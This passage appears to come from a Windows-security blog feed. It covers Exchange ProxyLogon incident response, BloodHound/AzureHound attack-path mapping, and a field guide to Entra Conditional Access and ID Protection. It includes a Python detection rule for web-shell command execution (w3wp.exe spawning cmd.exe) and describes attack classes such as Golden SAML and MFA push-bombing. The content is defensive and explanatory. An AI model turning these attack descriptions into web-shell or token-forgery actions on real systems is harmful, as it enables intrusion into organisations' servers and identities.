BloodHound Community Edition with the SpecterOps AzureHound collector is the cloud-side companion to SharpHound's on-premises Active Directory enumeration. Combined BloodHound CE graph models both on-premises and cloud-identity attack paths with explicit cross-boundary edges for Azure AD Connect, Pass-Through Authentication, hybrid-joined devices, and federated trusts [@azurehound-github, @bloodhound-azurehound-docs, @bloodhound-specterops]. BloodHound CE plus AzureHound occupies the graph-reachability lane: what is the set of lateral-movement paths from any identity to any Tier-0 cloud or on-premises identity?

Layer the three tools together. The composition is the operational closure of §5's "policy is code" claim against the §9 open-problem-3 detection lane.

CAOptics was archived read-only by its maintainer in August 2024 with the README note "Project archived due to shifting development priorities" [@caoptics-github]. The tool remains functional and architecturally canonical for the gap-enumeration lane; readers wanting active development for the graph-reachability lane should track SpecterOps's BloodHound CE AzureHound documentation [@bloodhound-azurehound-docs] for the rolling-release collector and BloodHound CE schema updates.

Logic equivalent of a Sigma rule for the ProxyLogon-class web-shell pivot. The rule matches the canonical fingerprint of an IIS worker spawning cmd.exe under the IUSR identity (Exchange front-end shells typically execute under IUSR_ after dropping into IIS).

def matches_proxylogon_pivot(event): return ( event.get('event_id') == 4688 # process creation and event.get('parent_process_name', '').lower().endswith('w3wp.exe') and event.get('process_name', '').lower().endswith('cmd.exe') and (event.get('user_name') or '').lower().startswith('iusr') )

example = { 'event_id': 4688, 'parent_process_name': 'C:\\Windows\\System32\\inetsrv\\w3wp.exe', 'process_name': 'C:\\Windows\\System32\\cmd.exe', 'user_name': 'IUSR_EXCH01', } print('match' if matches_proxylogon_pivot(example) else 'no match') `}

Lane 3: Confirmed-compromise response. A confirmed signed-vendor-update compromise is a vendor-level incident. Rotate every secret the trojanized binary could have read. Treat ADFS token-signing certificates as compromised; rotate them with new private key material on hardware-attested storage where possible. Rotate krbtgt twice per the Microsoft AD Forest Recovery procedure to invalidate any forged Kerberos tickets. Assume Conditional Access policies were bypassed during the active window if Golden SAML was in play; review sign-in logs for the affected federated trust for the full intrusion window.

The double-krbtgt rotation is not paranoia. A single rotation invalidates tickets signed with the prior key; a second rotation, after the configured maximum-ticket-lifetime, ensures the prior-prior key is also retired and no ticket signed with either prior key is still valid. The Microsoft AD Forest Recovery procedure documents the operation explicitly, with a minimum 10-hour wait between resets to exceed the default Maximum-Lifetime-For-User-Ticket and Maximum-Lifetime-For-Service-Ticket policy values [@ms-ad-forest-recovery-krbtgt]. The procedure exists because the second rotation cannot happen until any in-flight ticket with the prior key has expired, and skipping it leaves a window in which forged tickets remain serviceable.

Lane 4: What does not work. The operational anti-patterns the four incidents made expensive.

Note: Patching CVE-2021-26855 alone is insufficient if the web shell was already on disk before the patch -- the patch closes the entry; it does not remove the shell. Rotating krbtgt does not address Golden SAML; Golden SAML is a SAML-token-signing problem, and krbtgt is the Kerberos key. Rotating ADFS token-signing certificates is the corresponding action. Enabling Conditional Access for the identity the attacker forged tokens for is a closed-stable-door fix; Conditional Access enforcement happens at the resource server, and a forged SAML assertion already passed through the identity layer at the moment the resource server checks. Pluton on the workstation does not retroactively protect the Domain Controller -- Pluton is workstation-class silicon in 2023, and Server SKUs are a separate roadmap.

The FAQ closes the audit-flagged premises this article opened with.

11. Frequently Asked Questions

No. The canonical pre-auth chain is three CVEs: CVE-2021-26855 (server-side request forgery) into CVE-2021-26858 or CVE-2021-27065 (arbitrary file write) into an ASPX web shell at SYSTEM [@volexity-exchange-marauder, @tenable-exchange-zd]. CVE-2021-26857 is a separate insecure-deserialization RCE in Exchange Unified Messaging that requires authentication; it sits in a parallel position to the SSRF chain rather than as a fused step. The "four chained zero-days" shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. Microsoft's March 2 advisories cover all four CVEs together because they were patched together, not because they were exploited as a single linear chain. No. See §3.2 Blast radius for the breakdown: Krebs reported "at least 30,000" U.S. organizations pre-patch on March 5 [@krebs-hafnium-march5]; Bloomberg reported "as many as 60,000" worldwide on March 7 [@krebs-hafnium-march5]. The figure that runs toward 250,000 aggregates *post-patch* indiscriminate exploitation by multiple actor groups (LuckyMouse, Tick, Calypso, Winnti, and others, per ESET's March 10 ten-APT-groups analysis [@eset-exchange-10apt-2021]) in the weeks after Microsoft's March 2 advisory; it is not a pre-patch numerator. The product was called Azure AD Identity Protection at the time. Azure AD Conditional Access (the policy engine) and Azure AD Identity Protection (the risk-signal source) were already integrated before 2021; the integration is what makes risk-based Conditional Access policies possible. The "Entra" brand was introduced on May 31, 2022 as a family umbrella in Vasu Jakkal's "Secure access for a connected world--meet Microsoft Entra" announcement on the Microsoft Security Blog [@ms-entra-launch-may2022], and the rename of Azure AD to Microsoft Entra ID -- and therefore of Azure AD Identity Protection to Microsoft Entra ID Protection -- happened on July 11, 2023 [@ms-entra-rebrand]. Citations to the 2021-2022 product should use the Azure AD naming; citations to the current product use Microsoft Entra ID. No. NIST SP 800-207 [@nist-sp-800-207] references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document is a vendor-neutral synthesis of Kindervag's 2010 Forrester framing [@kindervag-2010-forrester], Forrester's ZTX taxonomy, Gartner's CARTA continuous-evaluation framing, federal TIC guidance, and BeyondCorp's worked example. "Zero Trust" predates BeyondCorp -- Kindervag coined the term in September 2010, four years before Ward and Beyer's first BeyondCorp paper [@ward-beyer-2014-usenix]. The marketing-collapsed reading of "Zero Trust equals BeyondCorp" or "Zero Trust equals Microsoft Conditional Access" obscures a thirteen-year intellectual chain. The bug is in Apache Log4j, a Java logging library [@log4j-apache-security], and the affected versions are Log4j 2.0 through 2.14.1. The vulnerability is not Windows-specific. It belongs in this Windows-security series because the most enterprise-impactful exploitation in Windows-server fleets ran through Java applications hosted on Windows: Tomcat, JBoss, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows, and dozens of internal Java services running on Windows Server with embedded JREs. The architectural lesson -- that transitive dependency graphs are the new universal attack surface -- applies to every operating system that hosts Java, but Windows fleets were a substantial fraction of the affected population. Both, depending on what is being counted. Pluton was announced on November 17, 2020 [@weston-2020-pluton]. The first commercial PCs to ship with Pluton enabled were the Lenovo ThinkPad Z13 and Z16 with AMD Ryzen 6000 SoCs, announced at CES 2022 on January 4, 2022 [@pluton-windows-blog-jan2022, @lenovo-thinkpad-z-press-jan2022] with general commercial availability starting in May 2022 per Lenovo's StoryHub pricing-and-availability disclosure [@lenovo-thinkpad-z-press-jan2022]. The chipset rollout broadened across 2022-2024 to include AMD Ryzen 7000, 8000, and 9000, Intel Core Ultra 200V and Series 3, and Qualcomm Snapdragon 8cx Gen 3 and X Series processors [@ms-pluton-learn]. Pluton present is not Pluton enabled -- OEMs can disable the processor at the firmware level via PSP directory entry 0xB bit 36 on AMD platforms [@mjg59-pluton] -- so fleet-management claims about Pluton deployment should distinguish "present" from "enabled and acting as the TPM."

The four incidents are the receipt the industry collected on a thirty-six-year-old prediction. The Generation 5 defensive stack is the vocabulary the industry borrowed to talk about what changed. The vocabulary is now sufficient. The trust roots are not. Part 6 picks up the trust-root layer where Generation 5 left it -- Storm-0558 (July 2023), the Microsoft consumer-MSA signing-key compromise that produced enterprise tokens Conditional Access could not distinguish from legitimate ones, and the architectural question it opened: if the policy engine itself is privileged, what closes the compromise of the policy engine as a class?

Who Decided This Token Is Good? A Field Guide to Conditional Access and Entra ID Protection

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Conditional Access is Microsoft's Zero Trust policy engine, not a feature.** Every interactive sign-in to a licensed Microsoft 365 tenant flows through three planes: a signal plane (Entra ID Protection's machine-learning risk scoring), a policy plane (Conditional Access's JSON rule evaluator), and a session plane (Continuous Access Evaluation's event-driven revocation channel). This article assembles the wire format of all three -- the `riskDetection` resource on Microsoft Graph, the `conditionalAccessPolicy` schema, the `cp1` client capability that opts a client into 28-hour tokens, and the `401 + insufficient_claims` claims challenge -- into one end-to-end picture, then names the five things this architecture fundamentally cannot do.

1. Who decided this token is good?

It is 09:02 on a Tuesday in Lisbon. Alice opens Outlook on a managed laptop in a hotel and the reading pane populates with mail in under a second. She did not type a password. She did not approve a push. She did not touch a hardware key.

Who decided that was fine?

The question is harder than it looks. Alice's password lives in a token cache from yesterday's sign-in at the office. Outlook's client silently acquires a fresh access token from Entra. That request may match a Conditional Access policy. The policy may consult an Identity Protection risk score. The result is either an access token or a refusal. Exchange Online receives the token, validates it, and may yet revoke it mid-session because something changed in the last sixty seconds. Bytes return to Alice.

Microsoft Entra ID's policy engine for evaluating sign-in attempts. A Conditional Access policy is a JSON object that matches a set of users, cloud apps, and conditions (network location, device state, sign-in risk, user risk, client app, platform) against a set of grants (block, require MFA, require compliant device, require Authentication Strength, and so on). Policies are evaluated after first-factor authentication; a block grant in any matching policy overrides all allow grants [@ms-ca-overview]. The machine-learning signal plane that scores sign-ins and users for risk. ID Protection emits `riskDetection` events tagged with `riskEventType` (anonymized IP, leaked credentials, password spray, atypical travel, and roughly two dozen others), `riskLevel` (low, medium, high), `riskState`, and `detectionTimingType` (realtime, nearRealtime, or offline). Available only on Microsoft Entra ID P2 [@ms-id-protection-overview]. The session plane. CAE is an event-driven channel between Microsoft Entra and CAE-aware resource APIs (Exchange Online, SharePoint Online, Teams, Microsoft Graph). When a critical event fires -- account disabled, password reset, high user risk, network location change -- the resource API returns `HTTP 401` with a `WWW-Authenticate: Bearer error="insufficient_claims"` challenge. The client replays the embedded claims to Entra and acquires a fresh token. In exchange for this channel, CAE tokens live up to 28 hours [@ms-cae-concept].

Every component in this chain is individually documented on Microsoft Learn. The Conditional Access policy schema is on the Graph reference [@ms-graph-capolicy]. The riskDetection resource is on the Graph reference too [@ms-graph-riskdetection]. The cp1 client capability is in the claims-challenge document [@ms-claims-challenge]. The "up to 15 minutes" propagation ceiling for CAE non-IP events is in the CAE concept document [@ms-cae-concept].

But the chain is not assembled anywhere. That is what this article does.

This article is for the architect or the detection engineer who already knows what a JWT is, what a service principal is, and what an MDM does. If you have ever stared at a Sign-in log entry that reads "Conditional Access: Success" and wondered what exactly the policy engine concluded, this is for you.

Three moments of insight are coming. First, why MFA without context fails not because MFA is weak but because the unit is wrong (Section 3). Second, why the architectural breakthrough was a separation and not a new algorithm (Section 5). Third, why the system has limits that no engineering will fix (Section 8).

How did the industry end up with a token-issuance and claims-challenge model? The answer begins in 1975, with a paper that did not mention identity once.

2. From perimeter to identity boundary

In September 1975, Jerome Saltzer and Michael Schroeder published an eight-principle paper on operating-system protection that nobody at MIT thought of as a paper about cloud identity [@saltzer-schroeder-1975]. Half a century later, two of those eight -- complete mediation and least privilege -- are the implicit theorems every Conditional Access policy evaluates against. Where did the industry go in between?

Saltzer and Schroeder: the unstated theorems

Complete mediation says "every access to every object must be checked for authority." Least privilege says "every program and every user of the system should operate using the least set of privileges necessary to complete the job." These are stated as design principles, not theorems. But they function as theorems for anyone building an access-control system: violate either of them and you have, by construction, a vulnerability. Conditional Access does not derive the principles. It re-states them as a JSON schema and a runtime evaluator.

Jericho Forum: the perimeter dissolves

In 2003, David Lacey of the Royal Mail and a loose affiliation of corporate CISOs began arguing, against the prevailing castle-and-moat consensus, that the corporate network perimeter could no longer be relied on as the trust boundary. The Jericho Forum formally launched under the Open Group umbrella in January 2004 [@wikipedia-jericho-forum]. They coined the term "de-perimeterisation" to describe what their member firms were already living: data and identity travelling outside the firewall faster than the firewall could be moved.

Microsoft's own retrospective puts the quote precisely: the Jericho Forum "promoted a new concept of security called de-perimeterisation that focused on how to protect enterprise data flowing in and out of your enterprise network boundary instead of striving to convince users and the business to keep it on the corporate network" [@simos-2020-jericho]. The first sentence of Microsoft Learn's CA overview today is a direct descendant: "modern security extends beyond an organization's network perimeter" [@ms-ca-overview].

Kindervag: the name

John Kindervag, then a principal analyst at Forrester Research, gave the model its marketable name in a September 2010 report titled "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-zero-trust]. Three tenets: all resources are accessed securely regardless of location; access control is on strict need-to-know and strictly enforced; all traffic is inspected and logged.

The label stuck. Microsoft Learn now calls CA "Microsoft's Zero Trust policy engine" in its first sentence [@ms-ca-overview]. The lineage from Kindervag's 14-page Forrester report to that sentence is direct.

The original Kindervag PDF is gated behind Forrester's paywall. The widely cited copy on ndm.net redirects to an unrelated managed-IT-services company; the only reliably accessible mirror is the Wayback Machine snapshot. Treat the lineage as well documented and the URL as a curiosity of how academic ideas survive the open web.

BeyondCorp: the alternative

In December 2014, Rory Ward and Betsy Beyer published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: [@ward-beyer-2014-beyondcorp]. The paper described Google's internal Zero Trust deployment: every request authenticated and authorized by an access proxy, no implicit network trust, device inventory and user identity as the inputs to access decisions. A follow-up in 2016 documented the production rollout [@osborn-2016-beyondcorp].

This is the architectural fork Section 7 returns to. BeyondCorp puts the policy engine in the data path, as a reverse proxy that sees every HTTP request. CA puts the policy engine at token issuance and re-evaluates via claims challenges. Both work. They are not interchangeable.

NIST SP 800-207: the vocabulary

In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207-2020]. It codified the U.S. federal reference architecture: a Policy Engine that decides, a Policy Administrator that effects the decision, and a Policy Enforcement Point that intercepts the access.

That trio is the vocabulary the Microsoft Learn CA documentation now uses. In the SP 800-207 mapping, Conditional Access is the Policy Engine and Policy Administrator; Exchange Online, SharePoint Online, Teams, and Microsoft Graph are the Policy Enforcement Points; Entra ID Protection is the trust algorithm that feeds the Policy Engine.

If you ever have to map Conditional Access to SP 800-207 for a compliance review, the cleanest correspondences are: PE = the CA evaluator inside Entra; PA = Entra's token issuer (because the decision is effected by issuing or refusing a token); PEP = the resource API (Exchange, SharePoint, Graph) that validates the token, plus, for CAE-aware resources, the same API enforcing claims-challenge revocation mid-session. ID Protection is the "trust algorithm" input to the PE.

The doctrine was settled by 2020. But Microsoft had already been trying to build a perimeter on identity for six years, starting in 2014 with a much smaller idea.

3. Per-user MFA and the limits of binary controls

In 2014, Microsoft's only cloud-era access control was a per-user toggle that said MFA: yes or MFA: no. The toggle worked. It was a real improvement over passwords alone. It also produced the most exploited security failure of the next decade: MFA fatigue [@weinert-2023-managed-policies].

How does a control improve security and create a new attack class at the same time?

The per-user MFA state machine

Per-user MFA lives on the user object as a tri-state: Disabled, Enabled, or Enforced. Microsoft Learn now says the quiet part out loud: "The best way to protect users with Microsoft Entra MFA is to create a Conditional Access policy" and "Don't enable or enforce per-user Microsoft Entra multifactor authentication if you use Conditional Access policies" [@ms-howto-mfa-userstates]. That guidance carries a generation of operational pain inside it. Mixing the two surfaces, in practice, produces unpredictable prompts: a CA policy says "no MFA required for this location," the per-user state says "always MFA," and the user gets prompted twice.

Note: Microsoft's explicit guidance is to pick one surface. If you have Entra ID P1 or higher, use Conditional Access. The per-user state should remain Disabled for those accounts. Mixed configurations produce both false-positive prompts and, occasionally, false-negative skips [@ms-howto-mfa-userstates].

Trusted IP rules: one-dimensional context

Office 365 added a second knob in the same era: "trusted IPs." Sign-ins from a configured public IP range would skip the MFA challenge [@ms-ca-network]. The idea was that "on the corporate network" meant "more trustworthy." This was reasonable in 2014. By 2017, it was already eroded by full-tunnel VPNs (every employee egresses through the corporate /16 from home), split-tunnel VPNs (some traffic does, some does not), and the realisation that "corporate network" had stopped being a useful synonym for "trusted." Trusted IP is one-dimensional context, and one dimension was not enough.

Security Defaults: the Free-SKU descendant

Since 22 October 2019, every new Entra ID tenant has Security Defaults turned on by default at creation [@ms-security-defaults]. Security Defaults is a tenant-wide on/off switch that requires MFA for all admin roles, MFA for users when they show risk, blocks legacy authentication, and forces MFA registration. Microsoft's number on the impact is striking: "more than 99.9% of those common identity-related attacks are stopped by using multifactor authentication and blocking legacy authentication" [@ms-security-defaults].

For Entra ID Free tenants in 2026, Security Defaults is still the only available baseline. There is no per-app policy, no per-risk gating, no Conditional Access. This is the licensing reality Section 10 returns to.

Active Directory Federation Services -- AD FS -- is the on-prem federation product that ran the access-control story before any of this. It is still operational in many tenants. It is no longer Microsoft's strategic identity provider; the Microsoft Learn AD FS overview now opens with the explicit guidance "Instead of upgrading to the latest version of AD FS, Microsoft highly recommends migrating to Microsoft Entra ID" [@ms-ad-fs-overview]. AD FS claim rules functioned as a kind of policy engine, but they evaluated only at federation time and they had no concept of risk.

The four failure modes of the binary toggle

The first-generation controls -- per-user MFA, trusted IPs, Security Defaults -- share four documented limits:

No expression of context. The toggle is either on or off. It cannot say "MFA from a new country but not from the office."
Trusted IP is thin context. A public IP range is one bit of information; modern attacks include matching network egress.
No per-app policy. The toggle applies to all apps the user accesses. You cannot say "MFA for the admin portal, not for Outlook."
No exclusion semantics for break-glass accounts. Emergency-access accounts need to be reachable when everything else has failed. The binary toggle either includes them or excludes them; it does not let you say "exclude these accounts but log every sign-in as a high-priority alert."

MFA fatigue: when a control becomes a credential

The canonical failure of the binary toggle is push-bombing. The attacker has the password. The system requires MFA. The user gets four "approve sign-in?" notifications during a morning meeting. One gets a thumbs-up by reflex. The system did exactly what it was configured to do.

The attack works because the control has no concept of whether this is a normal sign-in. The same flow runs whether the request originates from the user's office WiFi or an anonymizing proxy in another country. The MFA challenge carries no risk-weighted information; the user has no signal that this prompt is different from yesterday's prompt. Fatigue is the consequence. Microsoft's own Entra blog catalogued the attack pattern and the operational mitigations in the wake of the 2022 incident cluster [@ms-techcom-mfa-fatigue].

Focusing on password rules, rather than things that can really help -- like multi-factor authentication (MFA), or great threat detection -- is just a distraction. -- Alex Weinert, Microsoft Identity, July 2019 [@weinert-2019-password]

Weinert's 2019 piece is now infamous in the identity community for its title alone -- "Your Pa$$word doesn't matter." The argument was that a password's composition rules carry no information that helps the system tell a real user from an attacker; what does carry information is context. The system needed a place to put that context.

If MFA yes/no cannot express context, the next step is obvious: make context the input. But to make context the input, the system needs a place to put it. The history of CA from 2015 forward is the history of giving context a home.

4. Generation by generation

The next eight years produced six generations of access control, each one closing a specific failure of the previous one. They look like product launches in a marketing chronology. They are something more interesting: a sequence of negative results, each followed by a positive engineering response.

timeline title Conditional Access timeline 2014 : Gen 1 per-user MFA and trusted IPs 2015 : CA enters public preview 2016 : Gen 2 Conditional Access general availability 2016 : ID Protection enters preview 2018 : Gen 3 risk-based CA conditions broadly available 2020 : CAE enters preview 2022 : Gen 4 Continuous Access Evaluation general availability 2023 : Gen 5 CA for workload identities 2023 : Gen 6 Microsoft-managed policies and Authentication Strengths 2026 : CA for AI agent identities

The 2026 milestone -- Conditional Access for AI agent identities -- is itself still emerging; Microsoft's current framing in the Conditional Access Optimization Agent announcement names it explicitly as a frontier rather than a finished generation [@ms-techcom-ca-optimization-agent]. Section 9.1 returns to the open problems.

Gen 1 (2014 to 2016): per-user MFA

Documented in Section 3. The control has no concept of context. The failure motivates Gen 2.

Gen 2 (September 2016 GA): Conditional Access with static rules

The September 27, 2016 CloudBlogs post announcing CA general availability framed it as "Protect your data at the front door" -- the "front door" framing that Microsoft documentation still uses [@ms-techcom-ca-frontdoor-2016]. The policy schema (users + cloud apps + conditions to grants) was introduced in the 2015 preview [@ms-techcom-ca-preview-2015] and survived essentially unchanged into 2016 GA.

Gen 2 closed Gen 1's failure mode: context now had a home. A policy could match on network location, on the app being accessed, on the user's group membership, on the device platform. It could express "block country X" or "require MFA when not on the corporate network."

The remaining documented limit: no risk feed. The engine could express what to check for but not whether this specific sign-in looks suspicious. A policy could block credential-stuffing attempts only if you happened to know in advance which IPs to deny. Motivated Gen 3.

Gen 3 (2017 to 2018): risk-based fusion

Identity Protection had been generating risk signals since its March 2016 preview. Through 2017 and 2018, two new condition keys appeared in the CA policy schema: signInRiskLevels and userRiskLevels. Both take values from the set low, medium, high. The risk feed plugged into the policy plane through exactly two keys. The legacy ID-Protection-side risk policies (which were a parallel policy surface inside ID Protection itself) are now retiring on 1 October 2026; the canonical surface is CA [@ms-id-protection-policies].

The remaining limit: pre-issuance only. The CA evaluator runs at sign-in time. Once a token is issued, the policy plane has no way to undo the decision until the token expires. Microsoft's own retrospective is honest about what they tried first: "Microsoft experimented with the 'blunt object' approach of reduced token lifetimes but found they degrade user experiences and reliability without eliminating risks" [@ms-cae-concept]. A one-hour token cuts the worst-case revocation latency to an hour, but it also means a user with intermittent connectivity gets prompted every hour, and a mobile app with retry storms can hammer the IdP. The trade-off was unacceptable. Motivated Gen 4.

Gen 4 (January 2022 GA): Continuous Access Evaluation

CAE inverted the trade-off. Instead of shortening the token, lengthen it -- up to 28 hours [@ms-cae-concept]. Then add a side channel: when a critical event fires (account disabled, password reset, high user risk, IP location change), the resource API issues an HTTP 401 with a WWW-Authenticate claims challenge, and the client replays to Entra for a fresh token. Latency on the side channel is bounded: "up to 15 minutes" for non-IP events, "instant" for IP locations [@ms-cae-concept]. CAE was tied to an emerging open standard from day one, the OpenID Continuous Access Evaluation Profile [@ms-cae-concept]. The general-availability announcement landed on 10 January 2022 [@ms-techcom-cae-ga-2022].

Remaining limit: applies to humans only. Service principals do not consume CAE-aware client libraries; they cannot perform a claims challenge. Motivated Gen 5.

Gen 5 (2023 GA): Conditional Access for workload identities

Same engine, constrained grant set. The Microsoft Learn page is blunt on the boundaries: "Workload Identities Premium licenses are required" and the constraint set is unusual -- "Policy can be applied to single tenant service principals that are registered in your tenant. Microsoft and third-party SaaS applications, including multitenant apps, are not covered by these policies. Managed identities aren't covered by policy" and "Under Grant, Block access is the only available option" [@ms-workload-identity-ca]. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product followed in late November 2022, and the Conditional Access feature for workload identities itself reached general availability later in 2023.

The single-tenant restriction is a structural choice. Multi-tenant SaaS apps appear in many tenants' service principal directories at once; policy scoping on them would require a cross-tenant resolution protocol the engine does not have. Managed identities are excluded because they belong to Azure subscriptions, not to user identity, and Microsoft has chosen not to extend the surface there. Group assignments do not work either: "Conditional Access policies assigned to a group that contains a service principal are not enforced for that service principal" [@ms-workload-identity-ca].

Remaining limit: under-configured in most tenants because the grant taxonomy is so narrow that admins do not see immediate value. Motivated Gen 6.

Gen 6 (November 2023 onwards): Microsoft-managed policies and Authentication Strengths

In November 2023, Alex Weinert announced Microsoft-managed Conditional Access policies: a set of baselines that Microsoft would auto-deploy into tenants in Report-only mode and then auto-enable after a waiting period [@weinert-2023-managed-policies]. The launch announcement specified a 90-day window [@helpnet-2023-microsoft-entra-policies]. The current Microsoft Learn documentation specifies "Microsoft enables these policies no less than 45 days after they're introduced in your tenant if they're left in the Report-only state" with a 28-day pre-enablement notification [@ms-managed-policies].

The window shrank deliberately. The 90-day window in the 2023 launch announcement was a calibration window; the 45-day window in current documentation is the post-calibration setting. Both numbers are correct in their respective time frames. The article uses the current number throughout.

Parallel to the managed policies, Microsoft shipped Authentication Strengths -- a named bundle of acceptable authentication methods that can be required as a grant. The three built-in strengths are MFA strength, Passwordless MFA strength, and Phishing-resistant MFA strength (FIDO2 security key, Windows Hello for Business, multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the modern way to express "no adversary-in-the-middle phishing kit should be able to defeat this grant."

The pattern: extension, not replacement

From Gen 3 onward, each generation extends the prior schema rather than replacing it. The conditionalAccessPolicy JSON shape that shipped in 2016 still drives the engine in 2026 -- with new condition keys added, new grant types added, new session controls added. By the standards of cloud control surfaces, that is a long run without a rewrite.

The reason is the architectural decision the next section is about.

5. The two-plane separation

The breakthrough is not a model, not a token format, not a wire protocol. It is a separation: the signal plane that produces risk detections from the policy plane that consumes them.

Stated like that, it sounds banal. Read it the other direction -- a policy engine whose risk model can change without changing the policy semantics, and whose policy can change without retraining the model -- and it is the design that makes the system maintainable at trillions of daily signals across hundreds of thousands of tenants.

The two planes, precisely

The signal plane is Microsoft Entra ID Protection. It runs detection logic on every interactive sign-in (and, for offline detections, on historical sign-ins) and emits a riskDetection resource into a per-tenant log on Microsoft Graph at /identityProtection/riskDetections. Each detection carries five fields you care about: riskEventType (one of about two dozen named detection types like anonymizedIPAddress, leakedCredentials, unlikelyTravel), riskLevel (low, medium, high, plus the bookkeeping values hidden and none), riskState (atRisk, confirmedCompromised, dismissed, remediated), detectionTimingType (realtime, nearRealtime, offline), and additionalInfo (a JSON blob with user-agent, IP, alert URL, reason codes) [@ms-graph-riskdetection][@ms-id-protection-risks].

The policy plane is Conditional Access. It is a JSON object at /identity/conditionalAccess/policies/{id} on the Graph API [@ms-graph-capolicy]. Each policy has displayName, state (enabled, disabled, enabledForReportingButNotEnforced), conditions, grantControls, and sessionControls. The conditions block contains the per-policy targeting: which users, which apps, which platforms, which network locations -- and two condition keys named signInRiskLevels and userRiskLevels.

**Sign-in risk** is a per-sign-in probability that the credential being used is being used by someone other than the legitimate owner *at this moment*. **User risk** is a per-user probability that the account itself has been compromised over its recent history. A user with leaked credentials in a breach corpus carries persistent user risk until the password is reset; a user signing in from an anonymizing proxy carries sign-in risk for that session. CA policies can match on either, both, or neither. Risk-based conditions require Entra ID P2 [@ms-id-protection-policies].

Those two condition keys -- signInRiskLevels and userRiskLevels -- are the entire API surface between the signal plane and the policy plane. Everything else about ID Protection is hidden behind them. The policy plane does not know whether high came from a transformer or a logistic regression or a hardcoded rule. The signal plane does not know which policies will read its output. The contract is two strings.

flowchart LR subgraph SP[Signal plane Entra ID Protection] DET[Detection pipeline] RD[(riskDetection log)] RL[Risk level low medium high] end subgraph PP[Policy plane Conditional Access] EV[Policy evaluator] POL[(conditionalAccessPolicy JSON)] TOK[Token issuer] end subgraph SES[Session plane CAE] CH[Critical event channel] RP[Resource API] end DET --> RD DET --> RL RL -. signInRiskLevels userRiskLevels .-> EV POL --> EV EV --> TOK TOK -- access token --> RP DET -. user risk events .-> CH CH -. 401 insufficient claims .-> RP

Why the separation matters

Three concrete consequences fall out of the design:

The risk model is re-trainable without policy rewrites. Microsoft's ID Protection team can change the underlying detection algorithm tomorrow. Add a new riskEventType. Replace the classifier for unlikelyTravel. Re-tune the threshold that maps a score to low/medium/high. None of these require tenants to rewrite their CA policies, because policies match on the level, not the signal.

Tenants without the licence simply do not use the risk conditions. An Entra ID P1 tenant can deploy CA policies that match on users, apps, locations, devices, client apps, and platforms. P2 unlocks the risk conditions. The schema accommodates both: P1 policies just leave the risk arrays empty. There is no parallel policy surface for the non-risk-aware tenants; they use the same engine.

CAE is a third plane layered onto the same skeleton. Continuous Access Evaluation did not require redesign of the policy plane. The CAE channel is a new event delivery mechanism; the events it propagates are things the signal plane already knew about (high user risk, password reset, account disabled) plus new ones the policy plane introduced (network-location-policy changed). The architecture absorbed CAE because the design was already a separation of concerns.

Key idea: The signal plane and the policy plane are separable; the contract between them is two condition keys (signInRiskLevels and userRiskLevels). That is what makes the system maintainable across a decade of evolution.

The "pit of success" framing

Alex Weinert calls this the "pit of success." His November 2023 piece on Microsoft-managed policies put the metric on it: a decade ago Microsoft turned on a "radical" tenant-wide policy requiring MFA for every consumer Microsoft account, and "today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication" [@weinert-2023-managed-policies].

The 100 percent number is achievable because the policy plane and the signal plane can each evolve independently. Microsoft can ship a managed policy that says "require MFA for high-risk sign-ins" without committing to a fixed definition of "high risk." The definition lives on the signal plane and changes weekly. The policy lives on the policy plane and is stable for years.

With the separation as the spine, the next section walks the end-to-end pipeline in one continuous trace, from signal to grant to token to session, on a real sign-in -- the trace no public Microsoft document assembles in one place.

6. The end-to-end pipeline

Take Alice's Tuesday morning from Section 1 and walk it forward. This section has six subsections. By the end of them, the question "who decided?" has six independently sourced answers and one combined picture.

6.1 What the signal plane sees

Identity Protection's detection taxonomy splits into five rough groups, based on what kind of information triggered the detection. The canonical taxonomy is the Microsoft Learn page on risk types [@ms-id-protection-risks]; the wire-format enum on the Graph schema is at [@ms-graph-riskdetection].

Network signals. anonymizedIPAddress, maliciousIPAddress, nationStateIP, riskyIPAddress. The signal is the source IP and reputation databases that ID Protection ingests.
Behavioural signals. unlikelyTravel, mcasImpossibleTravel, newCountry, unfamiliarFeatures, anomalousUserActivity. The signal is a deviation from the tenant's or the user's historical baseline.
Credential signals. leakedCredentials, passwordSpray. The signal is a match against a corpus of breached credentials or a velocity-based pattern across tenants.
Token and session signals. anomalousToken, tokenIssuerAnomaly, attemptedPrtAccess, attackerinTheMiddle, authenticatorPhishing. The signal is on the token itself or on the way the authenticator flow ran.
Inbox behaviour. suspiciousInboxForwarding, mcasSuspiciousInboxManipulationRules. The signal is on what happened after the sign-in -- a post-compromise indicator that retroactively flags the sign-in that enabled it.

Each detection is also tagged with a timing: real-time, near-real-time, or offline. Microsoft Learn is precise about the latencies: "Detections triggered in real-time take 5-10 minutes to surface details in the reports. Offline detections take up to 48 hours" [@ms-risk-detection-types].

The detection is mapped to a risk level, not a probability. Microsoft Learn calls the level "calculated by our machine learning algorithms" and explicitly notes the meaning: low/medium/high "represent how confident Microsoft is that one or more of the user's credentials are known by an unauthorized entity" [@ms-risk-detection-types]."Confidence" here is meant in the everyday sense, not the strict statistical sense of a confidence interval. Microsoft has not published a calibration study that would let you map a "high" risk level to a frequentist probability of compromise.

The figure you sometimes see in Microsoft marketing materials -- "more than 100 trillion signals processed per day" [@ms-managed-policies], or, in older sources, "78 trillion" [@ms-id-protection-overview] -- is the aggregate signal volume across all tenants and product surfaces, not per-sign-in features per user. The article keeps the two carefully separate.

Microsoft has not publicly disclosed the production model architecture, the feature vector size, or per-detection precision and recall. The 2021 Microsoft Security Blog interview with Maria Puertas Calvo describes the existence of the ML team and the operational scale ("hundreds of terabytes every day") but stops well short of architecture details [@ms-puertas-calvo-interview]. The model class is publicly unspecified; the taxonomy and the operating output are both public.

6.2 How risk surfaces

